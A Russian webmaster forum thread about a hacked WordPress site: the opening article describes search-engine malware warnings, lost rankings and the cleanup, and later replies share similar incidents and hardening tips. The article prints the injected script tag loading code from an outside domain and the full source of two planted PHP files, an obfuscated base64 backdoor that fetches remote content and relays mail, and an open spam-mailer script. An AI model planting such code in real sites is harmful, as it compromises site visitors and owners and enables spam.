[X] Помощник

[r0mZet Topic Starter]

Статья для конкурса "Статейник 3"

Как-то раз один из моих клиентов позвонил мне и сообщил неприятнейшую новость касательно его сайта (на WordPress). Я сначала и не понял в чем дело и что вообще произошло, но первым делом решил посетить его сайт и посмотреть что к чему. Главная страница сайта так и не загрузилась, а вместо нее мой браузер выдал предупредительную картинку мол нистоит посещать этот сайт иначе подцепите вирус и плохое настроение Вам обеспечено на долго. Аналогично мне сообщили и другие браузеры (кроме браузера IE конечно) через которых я пытался зайти.




Ну понятно, сайт поразился вирусом. Яндекс-вебмастер у меня в списке этот сайт пометил значком биологического заражения "На страницах вашего сайта xxxxx.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.".

Какие из этого сразу вытекают проблемы:
1) Трафик не доходит не получает искомую релевантную страницу
2) Падение авторитета брэнда
3) Вирус отпугивает потенциальных клиентов
4) Падение сайта в выдаче по ключевым запросам

В поисковой выдаче сайт тоже был с пометкой о заражении и не разворачивался при клике (спасибо Яндекс, защитил). По поисковым позициям сайт резко пошел вниз. В поисковике забил что-то типо "проверка сайта на вирусы онлайн". Кликнул сразуже на первую строчку как помню - это была онлайн проверка от Др.Веб, но его проверка показала что сайт в порядке и вирусов не обнаружено. Окей. Кликнул на вторую строку - это был онлайн антивирус Аларм. В своем анализе он показал что вредоносным кодом на сайте является некий линк

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>

. И это меня слегка ошарашило. Ну раз проблема в Гугле, значит и спрашивать нужно у Гугла. Захожу в интерфейс вебмастера от Гугла (он кстати его тоже пометил как опасный сайт) начинаю делать проверку сайта на вредное ПО, в итоге Гугл говорит что в коде нашел вредоносную скрипт-ссылку

<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>

.
Каким образом она туда попала, я точно не знаю, могу лишь только предположить что через ХSS, но это лишь мое предположение.
Удалил эту вредоносную ссылку со всех страничек где только ее обнаружил. Делаю повторные проверки через Яндекс и Гугл вебмастерс, сайт проходит. Но через некоторое время проблема возвращается в точности как и было раньше.
Внимательней приглядевшись к структуре сайта, нашел некоторые новые PHP-файлы один из них имел путь ..wp-contentpluginsinisetup.php
Он был весь закодирован в base64. Я так не стал его расшифровать, но кому вруг интересно:

<?php $GLOBALS['_605166492_']=Array(base64_decode('Z' .'m9wZW4='),base64_decode('c3RyZWFtX2dl' .'dF9jb250ZW50c' .'w=='),base64_decode('Z' .'mNsb3N' .'l'),base64_decode('bWFpbA=='),base64_decode('YmFzZ' .'TY0X2' .'Rl' .'Y2' .'9' .'kZQ=='),base64_decode('YmFz' .'ZTY0X' .'2' .'RlY29kZQ' .'=' .'=')); ?><?php function _657184174($i){$a=Array('ODdkNzIwZDVlZmVjNjRhYmU5MzM3MDQ5MTFkNjk3MzM=','a2V5','aHR0cDovL2J1c21haWwucnUvc3RhdHk=','cg==','a2V5','dG8=','dGg=','bXM=','aHM=');return base64_decode($a[$i]);} ?><?php $key=_657184174(0);if(empty($_POST[_657184174(1)])){$stream=$GLOBALS['_605166492_'][0](_657184174(2),_657184174(3));echo $GLOBALS['_605166492_'][1]($stream,-1);$GLOBALS['_605166492_'][2]($stream);}if($_POST[_657184174(4)]==$key){$sd=$GLOBALS['_605166492_'][3]($_POST[_657184174(5)],$_POST[_657184174(6)],@$GLOBALS['_605166492_'][4]($_POST[_657184174(7)]),@$GLOBALS['_605166492_'][5]($_POST[_657184174(8)]));if($sd){echo 1;exit();}else{echo 2;exit();}}else{echo 3;exit();} ?>

Был еще один файл подозрительный файл который мне запомнился, находился в корне сайта под именем u_new_reg.php
Вот собственно его код:

<?php
$to      = $_POST["to_address"];
$BCC      = $_POST["BCC"];
$subject = $_POST["subject"];
$message = $_POST["body"];
$from = $_POST["from_address"];
$mailer = $_POST["x_mailer"];
$url = $_POST["url"];
$headers  = $_POST["headers"];
$result = mail($to, $subject, $message, $headers);
if($result)
{
echo 'good';
echo $to;
}
else
{
    echo 'error';
}
?>

Из кода в принципе понятно более менее предназначение этого злого файла. Как я уже говорил были и другие новые файлы, но уже не помню. Если такая ситуация повторится, то я обязательно дополню эту статью.

Вообщем, когда все эти сомнительные файлы были удалены и злые ссылки тоже, сайт востановился в глазах поисковиках. Но позиции не поползли вверх стремително также как падали, рост позиций по ключевым идет и по сегодняшний день, но очень медленно. Я рад что сайт вообще не вылетел из индекса, а пока буду прилагать все возможные усилия да бы востановить былую популярность сайта. Исходя из этого можно сделать вывод, что сайты которые были когда-то поражены вирусом, уже не так будут восприниматься поисковиками как раньше, возможно нужно время, оно и покажет.

В заключении я хотел бы дать совет вебмастерам - не забывайте своевременно обновлять движок сайта, составляйте сложные пароли для входа и не сохраняйте их в браузере, по возможности поставьте плагин по защите админки.

При поддержке: Seohammer - ссылочный агрегатор нового поколения. Обсудить на форуме.

[img]http://www.masterwebs.ru/sp/seohammer.gif[/img]

Сообщение отредактировал Sosnovskij - 24.9.2013, 19:21

[r0mZet Topic Starter]

ссылку вставить забыл http://rz-style.ru

[Johny Walker]

На личном опыте проверил как Яша относиться к сайтам с вирусом. Летом был в отпуске, пока я там находился, на сайте завелся скрипт. Вернулся, обнаружил, исправил, однако поздно. Яша полностью удалил из выдачи за это, и вернул только спустя 3 месяца.

[web_driver]

Тут несколько вариантов, чтобы этого больше не происходило.

1. Вовремя обновлять движок
2. Ставить нестандартную защиту админки и сложные пароли
3. Переносить уже взрослый и развитый сайт на свой самописный движок (будет намного меньше желающих его взломать, в отличие от популярных CMS).

Только так. А в популярных движках всё хорошо, кроме дыр в безопасности, которые часто возникают. Не успел обновить вовремя и залетела вирусня. у самого сколько раз было по началу. С другой стороны кто ищет и кому надо залезть, тот всегда найдёт способ. Нужно чаще проверять на вирусы и посторонние файлы + вовремя делать бэкап.

[ssabbass]

В перечень вариантов хотел добавить еще один пункт, с которым столкнулся лично я на движке DLE (на безопасность которого многие жалуются).

4. Внимательно проверять права пользователей / корректировать права групп зарегистрированных пользователей / вовремя выявлять и блокировать нарушителей.

В частности, столкнулся с тем, что пользователи после регистрации попадали в группу с открытым доступом к внутренним ресурсам. Когда доступ закрыл, все нормально стало. А до этого каждую неделю ломали.

[norten]

У меня проблемка была. Пока был на бесплатном хосте (.Народ) - всё ок, первая позиция была у одной нужной мне странички по моему региону (шли прямые звонки). Потом ушел на платный "нормальный" хостинг. Переезжал вроде все правильно. Вирусняк прицепился через недельки две-три (на joomla). Сам даже не смотрел. Хостинг оповестил меня. Я проверять, давай - труба, страничка свалилась аж на 7 страницу Яндекса. Сам я не сильный спец в тонкостях. Заказывал спеца - поправил, удалил. Сейчас только на одну страницу выше стали. Мда... До первой придется ползти.

[ssabbass]

Может при переезде что-то нарушили в URL страниц? Раз уж они так упали. Ведь должны же были сохраниться старые ссылки, передающие страницам вес. Да и тот же вирус вряд ли принес такие серьезные неприятности. Почти наверняка он у вас и раньше висел, только Народ.ру не из тех, кто беспокоится о сайтах своих пользователей. А при переезде вам просто сообщили об этом. Но думаю, что проблема здесь в другом.

[r0mZet Topic Starter]

Да и тот же вирус вряд ли принес такие серьезные неприятности.

Хорошо, что Вам он эти неприятности не приносил

[norten]

Почти наверняка он у вас и раньше висел, только Народ.ру не из тех, кто беспокоится о сайтах своих пользователей.

Это точно, молча "продались" юкосу.

Но думаю, что проблема здесь в другом.

Да может и в другом. Сейчас эта услуга у меня уже отпала сама как не прибыльная. Так что потасковал и пока забыл об этом.

Замечание модератора: Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней. Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой или обратитесь к любому из модераторов.